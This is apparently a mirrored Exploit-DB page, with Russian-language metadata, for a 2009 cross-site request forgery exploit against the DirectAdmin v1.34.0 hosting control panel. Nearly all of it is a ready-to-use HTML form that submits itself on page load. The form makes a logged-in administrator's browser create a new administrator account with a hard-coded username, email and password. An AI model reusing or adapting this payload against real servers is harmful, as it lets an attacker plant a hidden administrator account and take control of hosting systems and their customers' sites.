- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10779
- Проверка EDB
-
- Пройдено
- Автор
- SECURITYRULES
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-12-29
Код:
# Vendor: [http://www.directadmin.com/]
# Code : [Create Administrator] :
<html>
<title>DirectAdmin v1.34.0 XSRF Create Administrator Vulnerability</title>
<!--!Set You'r victim By SarBoT511 !-->
<form name="reseller" action="http://site.com:2222/CMD_ACCOUNT_ADMIN" method="post">
<input type="hidden" name=action value=create>
<input type="hidden" name="username" value="sec-r1z"></br>
<input type="hidden" name="email" value="r1z@sec-r1z.com"></br>
<input type="hidden" name="passwd" value="123456789"></br>
<input type="hidden" name="passwd2" value="123456789"></br>
<input type="hidden" value="Submit">
<body onload="document.forms.reseller.submit();">
</html>
- Источник
- www.exploit-db.com